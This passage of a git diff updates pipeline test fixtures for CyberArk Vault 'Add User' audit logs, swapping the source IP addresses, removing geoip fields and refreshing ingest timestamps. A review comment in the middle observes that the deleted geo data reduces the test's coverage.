09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add 
User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n 
Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add 
User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:19Z 
VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add 
User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n 
VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add 
User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json index a47fbac5093..e19f27f504a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +28,7 @@ "PSMPApp_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -48,7 +36,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMPApp_localhost.localdomain", "message": "Add User", 
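Review bot: In the `@@ -7,20 +7,8 @@` hunk of test-180-add-user.log-expected.json the whole `source.geo` object is deleted along with the old address, so the expected document no longer asserts any output of the geoip enrichment for `source.ip`; the same deletion repeats in the later `"source"` hunks of this file. If the test stack provides a lookup for the replacement range (the hunk only shows that the address moved to 67.43.156.13, not whether a geo result exists for it), the fixture should be regenerated with that result rather than trimmed, otherwise a regression in the pipeline's geoip step would go unnoticed by this test. If no lookup is available for the new addresses, that loss of coverage is worth stating in the changelog entry for this package, which is not visible in this chunk. The `event.ingested` rewrites in the neighbouring hunks are expected churn only if the test config marks that field as dynamic; otherwise the fixture will drift again on every regeneration.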
@@ -62,8 +50,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586584800Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830911800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -89,20 +77,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -122,7 +98,7 @@ "PSMPGW_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -130,7 +106,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMPGW_localhost.localdomain", "message": "Add User", 
@@ -144,8 +120,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586611Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830920400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -171,20 +147,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -204,7 +168,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -212,7 +176,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:35Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMP_ADB_localhost.localdomain", "message": "Add User", 
@@ -226,8 +190,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586616900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830924200Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -253,20 +217,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -286,7 +238,7 @@ "PSMApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -294,7 +246,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:19Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMApp_VAGRANT", "message": "Add User", 
@@ -308,8 +260,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586621300Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:19\",\"IsoTimestamp\":\"2021-03-10T17:59:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830928700Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:19\",\"IsoTimestamp\":\"2021-03-10T17:59:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", 
@@ -335,20 +287,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -368,7 +308,7 @@ "PSMGw_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -376,7 +316,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:27Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMGw_VAGRANT", "message": "Add User", 
@@ -390,8 +330,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586625300Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:27\",\"IsoTimestamp\":\"2021-03-10T17:59:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830933200Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 